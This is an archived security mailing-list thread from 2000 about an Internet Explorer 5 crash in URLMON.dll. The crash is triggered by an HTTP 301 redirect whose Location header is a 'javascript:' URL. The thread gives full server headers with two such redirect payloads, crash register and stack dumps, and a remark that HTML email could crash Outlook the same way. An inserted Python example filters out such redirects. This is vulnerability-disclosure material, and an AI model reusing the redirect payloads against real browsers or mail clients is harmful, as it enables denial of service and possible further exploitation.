Vulnerability Development mailing list archives
Re: IE5 crash
From: Mulder <Morpho () FBIAGENCY ORG>
Date: Sun, 24 Dec 2000 16:31:40 +0100
I have the same problem with Outlook in Windows ME. I never tried reproducing it, but it's very obvious since Outlook uses IE, so you could crash Outlook by sending an HTML email with what you said in your email.

Morpho

----- Original Message -----
From: "Dzzie Z" <dzzie () YAHOO COM>
To: <VULN-DEV () SECURITYFOCUS COM>
Sent: Saturday, December 23, 2000 12:49 PM
Subject: IE5 crash

Hi, stumbled across this crash for IE. I am on 5.00.2614.3500 in Win98SE. It seems pretty reproducible, with an illegal op in URLMON.dll.

1) Create a web page (local is fine) and put in an image to one of your servers. This crash doesn't even need an image extension on it... just aim it at a directory or script (works the same when the URL is requesting an image as well).

2) Have the server return the 301 found code with a location of 'javascript:<some js command>' = instant crash of IE...

When I first started playing with this it was crashing Explorer; I can't reproduce the Explorer crash anymore... but I have also updated my scripting engines and added J++. Here are the exact headers sent back and forth to the server on the request, and the crash log... just to clarify... the 'server: unix' thing is BS I put in when making the server.

[ Browser Request for http://127.0.0.1/ ]
GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
Host: 127.0.0.1
Connection: Keep-Alive

[ Server Response Headers ]
HTTP/1.1 301 Moved Permanently
Server: Apache/1.3.11 (Unix)
Pragma: no-cache
Accept-Ranges: bytes
Content-Length: 62
Connection: Close
Content-Type: text/html
Location: javascript:with(navigator){n='\n';alert(userAgent+n+platform)}

IEXPLORE caused an invalid page fault in module URLMON.DLL at 0187:77037fb8.
Registers:
EAX=00000000 CS=0187 EIP=77037fb8 EFLGS=00010206
EBX=00000000 SS=018f ESP=017beb08 EBP=017beb30
ECX=77034258 DS=018f ESI=00434048 FS=4c77
EDX=81706d60 ES=018f EDI=00000001 GS=0000
Bytes at CS:EIP:
8b 08 50 ff 51 18 6a 00 8b ce 8b f8 e8 82 c3 ff
Stack dump:
00000000 00000001 00433ec0 77037d5e 00434048 00000000 00000000 7af2a370 01149a60 00000000 017beb60 7ad906c0 00000001 00000000 01149b48 01149a60

==============================================

[ Browser Req for 127.0.0.1/image.gif ]
GET /image.gif HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
Host: 127.0.0.1
Connection: Keep-Alive

[ Server Response Headers ]
HTTP/1.1 301 Moved Permanently
Server: Apache/1.3.11 (Unix)
Pragma: no-cache
Accept-Ranges: bytes
Content-Length: 86
Connection: Close
Content-Type: text/html
Location: javascript:document.write('IE is so BUGGY'+' of course we are kind of abusing it too')

IEXPLORE caused an invalid page fault in module URLMON.DLL at 0187:77037fb8.
Registers:
EAX=00000000 CS=0187 EIP=77037fb8 EFLGS=00010202
EBX=00000000 SS=018f ESP=017beb08 EBP=017beb30
ECX=77034258 DS=018f ESI=0043407c FS=4c1f
EDX=8171e8c4 ES=018f EDI=00000001 GS=0000
Bytes at CS:EIP:
8b 08 50 ff 51 18 6a 00 8b ce 8b f8 e8 82 c3 ff
Stack dump:
00000000 00000001 00433ef4 77037d5e 0043407c 00000000 00000000 7af2a370 01149cd0 00000000 017beb60 7ad906c0 00000001 00000000 01149db8 01149cd0

The question is... can anything more interesting be done with this crash? Can anyone else reproduce?
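The defensive counterpart to the redirect described in the quoted message, added here as an example and not code from either poster: a client or filtering proxy that parses the response head and refuses to follow a Location whose scheme it cannot fetch over the network. The sample response is constructed, modelled on the headers above.

```python
from typing import Dict, Optional, Tuple
from urllib.parse import urljoin, urlsplit

# Only schemes a network client can actually fetch; javascript:, vbscript:,
# file: and the like are refused instead of being handed to a URL handler.
ALLOWED_SCHEMES = {"http", "https"}
REDIRECT_CODES = {301, 302, 303, 307, 308}


def parse_response_head(raw: str) -> Tuple[int, Dict[str, str]]:
    """Split a raw HTTP/1.x response head into (status_code, headers).
    Header names are lower-cased; the first occurrence of a name wins."""
    lines = raw.replace("\r\n", "\n").strip("\n").split("\n")
    status = int(lines[0].split()[1])
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if ":" not in line:
            continue  # not a header line, ignore
        name, value = line.split(":", 1)
        headers.setdefault(name.strip().lower(), value.strip())
    return status, headers


def safe_redirect_target(request_url: str, raw_response: str) -> Optional[str]:
    """Return the absolute URL to follow, or None if the redirect must be dropped."""
    status, headers = parse_response_head(raw_response)
    if status not in REDIRECT_CODES:
        return None
    location = headers.get("location")
    if not location:
        return None
    # Resolve relative targets against the request URL, as a browser would.
    # urljoin leaves a target with a foreign scheme (javascript:...) untouched.
    target = urljoin(request_url, location)
    if urlsplit(target).scheme.lower() not in ALLOWED_SCHEMES:
        return None
    return target


# Constructed sample responses, modelled on the thread's headers.
SAMPLE_BAD = (
    "HTTP/1.1 301 Moved Permanently\r\n"
    "Server: Apache/1.3.11 (Unix)\r\n"
    "Content-Type: text/html\r\n"
    "Location: javascript:with(navigator){alert(userAgent)}\r\n"
)
SAMPLE_OK = "HTTP/1.1 301 Moved Permanently\r\nLocation: /images/logo.gif\r\n"

if __name__ == "__main__":
    print(safe_redirect_target("http://127.0.0.1/image.gif", SAMPLE_BAD))  # None
    print(safe_redirect_target("http://127.0.0.1/image.gif", SAMPLE_OK))
```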
Current thread:
- IE5 crash Dzzie Z (Dec 23)
- Re: IE5 crash Dan Kaminsky (Dec 25)
- Re: IE5 crash Mulder (Dec 26)
- <Possible follow-ups>
- Re: IE5 crash Doe, John (Dec 25)
- Re: IE5 Crash Dzzie Z (Dec 28)